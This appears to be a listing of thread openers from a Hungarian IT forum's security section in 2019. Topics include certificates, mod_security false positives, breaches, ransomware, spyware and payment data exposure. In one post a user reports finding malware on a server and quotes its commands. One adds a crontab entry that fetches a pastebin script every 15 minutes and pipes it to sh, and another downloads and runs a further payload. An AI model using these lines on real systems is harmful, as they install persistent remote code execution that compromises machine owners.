Security-all

The certificate is not trusted because it is self-signed

 ( tovis | 2019. október 10., csütörtök - 22:17 )

A jól ismert hiba:
192.168.1.74 uses an invalid security certificate. The certificate is not trusted because it is self-signed. The certificate is only valid for slv10.tovis-lab.port0.org Error code: SEC_ERROR_UNKNOWN_ISSUER

Van erre valami költséghatékony megoldás?

Mod security szabályrendszer?

 ( plt | 2019. szeptember 12., csütörtök - 9:56 )

Apache verzióváltás után a mod_security modul rengeteg alapértelmezett szabállyal települt. (2.4-es apache)
Mivel a régi verzióban csak néhány saját fejlesztésű szabályom volt, örömmel megtartottam az újakat, remélve, nagyban növelik majd a szerver biztonságát.
Hát, tényleg. Túlságosan is. Már egy mezei Wordpress mentést is képesek blokkolni.
Tudtok ajánlani valamilyen jó szabályrendszert? Nem kell full-paranoid, de azért jó lenne, ha adna érdemi védelmet. A legfontosabb azonban, hogy feleslegesen ne blokkoljon kérelmeket.

Hackertámadás pusztította el a Magyar Fejlesztési Központ minden digitális adatát...

 ( csucsu | 2019. szeptember 11., szerda - 8:27 )

Minden politikai felhang nélkül:

A nulláról kénytelen újjászervezni az adminisztrációját a Magyar Fejlesztési Központ, miután július közepén egy hackertámadás megsemmisítette a teljes digitális adatbázisát.

Supermicro X9-X11 BMC sebezhetőség

 ( hunti | 2019. szeptember 6., péntek - 10:31 )

A Supermicro X9-X11 szerverek távmenedzsment moduljában (BMC) sebezhetőséget fedeztek fel, amely lehetővé teszi a támadó számára bármilyen USB eszköz távoli felcsatolását. Az érintett szerverekre elérhető a frissítés.

Forrás:
https://threatpost.com/usbanywhere-bugs-supermicro-remote-attack/147899/

Á, hagyd, úgysem értenék!

 ( gee | 2019. augusztus 27., kedd - 22:55 )

Használok egy szoftvert. Most mindegy is, hogy melyiket, a lényeg, hogy van neki előfizetése.
Kérdeztem az helpdesket, hogy lehet a kártya infót módosítani. Válaszolt a csóka, hogy a weboldalon ha kártyával fizetem a következő havi sápot, akkor eltárolják a kártya infót, a régit eldobják és majd az új kártyáról vonnak a jövőben.

Weboldal, kártyás fizetés, megjelenik a confirmation oldal.

Rajta a felhasználónevem, a jelszavam, mire fizettem elő, mennyi pénzt.

Ez lehet minden idők legfélelmetesebb megfigyelő gépezete

 ( battila | 2019. augusztus 9., péntek - 9:38 )

Elolvasgattam a cikket: Ez lehet minden idők legfélelmetesebb megfigyelő gépezete

es egy pontja felvonta a szemoldokom:

"Ez a cég 25 műholdról, 70 ezer hajóról és repülőgépről, 100 millió mobileszközről, több ezer internetre kötött okoseszközről, 5 ezer környezeti szenzorból, 40 ezer hírforrásból és 8 közösségi oldalról származó adatot kezel és összesít,"

A 100 millio mobileszkoz, hogy?!? Legalisan?

Nyomonkövetés a valóságban

 ( pepo | 2019. június 29., szombat - 1:13 )

Sziasztok!

Kaptam egy linket, amin egy videó látható. A videó egy "legális" nyomkövetővel "felszerelt" oldal működését mutatja, amikor figyeli az oldalba ágyazott hotjar szkript, mit is művel egy-egy felhasználó.
Az alábbi link csak pár napig tekinthető meg, ha időm engedi, készítek belőle megmaradó emléket.

http://insights.hotjar.com/r?site=1376904&recording=2299611161&token=b88889152b7e132a325308a73fd900d8
(Lent a Skip Pauses érdemes bekapcsolni.)

Barracuda magyar dealert keresek

 ( seferbt | 2019. június 27., csütörtök - 10:29 )

Sziasztok,

sikerült rábeszélni a menedzsmentet, hogy a jelenlegi symantec messaging gateway-t cseréljük le egy barracuda email security gateway v300-ra. Viszont itt az onlne kártyával vásárlás nem része a cégkultúrának, ezért kellene egy magyar dealer. Tud valaki ilyet? Én egy céget találtam, de kellene még 2, mert a 3 ajánlathoz ragaszkodnak.

Free SSL tanusítvány Cisco router Guest hálózathoz

 ( thotmesz | 2019. június 27., csütörtök - 8:29 )

Sziasztok!

Segítsetek nekem. :)
Szeretnék egy helyre Guest netet varázsolni, Cisco RV110W router eszközön. A konfig kész, másik VLAN, stb.. Működik.
Viszont kellene hozzá SSL tanusítvány, mert a Guest portálhoz csatlakozáskor panaszkodik az önaláírt tanusítványon...
Sajnos most már a mobilon a guest portál sem jön be, eddig rá tudtam kattintani, hogy figyelmen kívül hagyom.

Megoldható -e hogy készítsek egy free ssl tanusítványt a routerhez domain nélkül? Esetleg NoIP dns névhez?

Köszönöm!!!

OTP Electra kétfaktoros azonosítás

 ( gyrgyvrs | 2019. június 17., hétfő - 17:35 )

Sziasztok!
Az OTP Banktól kaptam egy tájékoztatót, hogy 2019. szeptember 1-től kétfaktoros azonosítást valósítanak meg, mobilappal. Levélben, postán kaptuk (bár elektronikus ügyintézésre vagyunk kötelezettek mindketten, eügyintézés rulez :-)). Most nem találom a nekem ideadott másolatot, neten nem találok leírást rá. Valakinek nincs egy jó linkje?

On the fly file encryption OneDrive\Google drive

 ( tigrincs | 2019. május 28., kedd - 21:27 )

Sziasztok,

Tud esetleg valaki javasolni olyan klienst (Linux, MacOS, iOS, Android) ami on the fly titkosit mielott az adat a felhobe kerulne? A lenyege az lenne ,hogy nem kell syncelnie az adatokat lokal mappaval (a telefonon nyilvan nincs 2TB+ helyem)

Decrypt my files zsaroló

 ( makgab | 2019. május 24., péntek - 8:55 )

Üdv!
Egy gép bekapott egy zsarolót.
Mindenhova tett egy "DECRYPT MY FILES" nevű szöveges állományt, hogy 48 óraig visszaállítható... stb.

Futott bele ebbe a virusba már valaki? Ez lehet a removal tool-ja(?):
https://howtoremove.guide/how-to-decrypt-ransomware/

Phising oldal?

 ( n4buk0d0n0z0r | 2019. május 20., hétfő - 20:28 )

BikeSafe.hu

Ez tényleg igazi oldal vagy phisingben utaznak?
Plain textben küldött jelszót, a regisztrációhoz nem kér megerősítést.
Jóskapista bicaját is tudom itt regisztrálni? Akkor mire jó ez?
Az adatvédelmi táj. sem 100-as, de ezt a szakértők jobban tudják.

Kémprogram detektálása Androidon?

 ( williwaw | 2019. május 20., hétfő - 18:23 )

Nagyon röviden a helyzet.
Ismerős exe valószínű valamilyen programmal lehallgatja / követi / monitorozza az illető Androidos telefonját, tevékenységét. Nem biztos, de erős a gyanú.
Mivel lehet a leghatékonyabban megtudni, megtalálni, hogy valóban történik-e ilyesmi?
Első körben csak meg kellene róla bizonyosodni. Nem resetre van szükség!

köszi
W.

Weben bankkártya fizetés, CVC kód láthatósága

 ( KGer | 2019. május 14., kedd - 10:50 )

Több helyen belefutottam abba, hogy weben jegyet akarok venni egy rendezvényre (mondjuk legyen rendezveny123.hu) és azt látom hogy

Név
Bankkártya száma
Lejárati dátum
CVC kód

egy az egybe megy HTTP POST adatként a rendezveny123.hu site-ra, ahol az ottani rendszergazda vagy fejlesztő ha akarja ki tudja olvasni magának és akár egy adatbázist építhet belőle.

Én tartok attól hogy egyszer csak kapok egy sms-t hogy 20.000 Ft-ot leemeltek vmelyik országból és azt se tudom majd hol szivárgott ki.

Mindig új bankkártyát igényelni meg idő és macera.

Böngészők és a CSS követés...

 ( end | 2019. május 12., vasárnap - 10:43 )

https://www.ghacks.net/2019/04/20/mozilla-plans-to-enable-hyperlink-ping-tracking-by-default-in-firefox/

Ki ne hagyjátok, mert főként a kommentekben rengeteg átgondolandó információ található!

Biztonsági kamera kezelése Linux serveren

 ( kalmarr | 2019. április 17., szerda - 20:00 )

Sziasztok,

szeretném a segítségeteket kérni abban, hogy milyen alternatívái vannak a biztonsági kamera szoftvereknek Linux rendszeren.
A nagy kérdésem, hogy pl: Synlogic minőségű rendszer - https://www.synology.com/hu-hu/surveillance - elérhetőe-e Linuxon, azaz ha készítek egy NAS szerver-t, akkor pl: ilyen szoftvert tudok-e valahol találni rá? Ami hasonló módon és képeségekkel megbírkozik a feladattal, vagy inkább válasszak inkább egy "kész" NAS szervert, mert nem lesz ilyen jellegű megoldás sehol...

Köszönöm előre is!

Kalmi

Pastebin, mint rootkit store

 ( _Franko_ | 2019. április 13., szombat - 15:18 )

Egyik szerveremen találtam.

Beleírja magát a cron-ba:

echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh" | crontab -

Majd ezt futtatva lehozza magát újra és újra:

(curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh

Letölt ezt-azt, futtat ezt-azt.

OTP

 ( efel | 2019. április 10., szerda - 22:12 )

https://www.otpbank.hu/portal/hu/JogiEtikaiNyilatkozat

Legalul:

Az OTP Bank Nyrt. által működtetett informatikai rendszer megfelel a 42/2015 (III.12.) Kormányrendeletben meghatározott zárt informatikai rendszer követelményeinek. A tanúsítvány regisztrációs száma: HUNG-T-ZART-389-2018

A Tanúsítvány érvényességének kezdete: 2018. március 31.

A Tanúsítvány érvényességének vége: 2019. március 31. <====

Feedback wanted: CScanner (Cloud Security Scanner)

 ( janoszen | 2019. március 28., csütörtök - 10:07 )

Kedves HuP közönség,

Tegnap kicsit fölbosszantottam magam egy security incidensen és azon melegében elkezdtem összerakni egy kis eszközt a probléma orvoslására. Eljutott olyan fázisba (van doksi, stb) hogy elétek bocsájssam visszajelzés céljából.

Forrás kód: https://github.com/janoszen/cscanner
Doksi: https://cscanner.io

Igen, Javaban van írva, a GoLang továbbra sem barátom.

Most a ti véleményetekre vagyok kíváncsi: milyen szabálykészlettel bővítsem még az eszközt?

Köszönöm

János

mod-security fals pozitív?

 ( Proci85 | 2019. március 20., szerda - 17:02 )

Sziasztok

Cégen belül próbálkozom pár weboldalnál bekapcsolni, mert könnyebb apache szinten megfogni a csúnya postokat, mint php-ból. Utóbbi jobban pörgeti a CPU-t és több hibázási lehetőséget rejt.

A gond viszont az, hogy több false pozitív riasztást ad.
Pl. ha egy fájlt töltenek fel, OK, ha többet már riaszt a 200004 ID-s rule. Ezt a neten többé kevésbé kamunak veszik, kapcsoljam ki..oké.

Armor Games data breach

 ( _Franko_ | 2019. március 13., szerda - 10:15 )

Dear Armor Games Players,

We respect the privacy of our users which is why as a precautionary measure, we are writing to let you know of a data security incident that may involve your personal information.

Verifications.io leak

 ( hendrick | 2019. március 10., vasárnap - 13:12 )

In February 2019, the email address validation service verifications.io suffered a data breach. Discovered by Bob Diachenko and Vinny Troia, the breach was due to the data being stored in a MongoDB instance left publicly facing without a password and resulted in 763 million unique email addresses being exposed. Many records within the data also included additional personal attributes such as names, phone numbers, IP addresses, dates of birth and genders. No passwords were included in the data.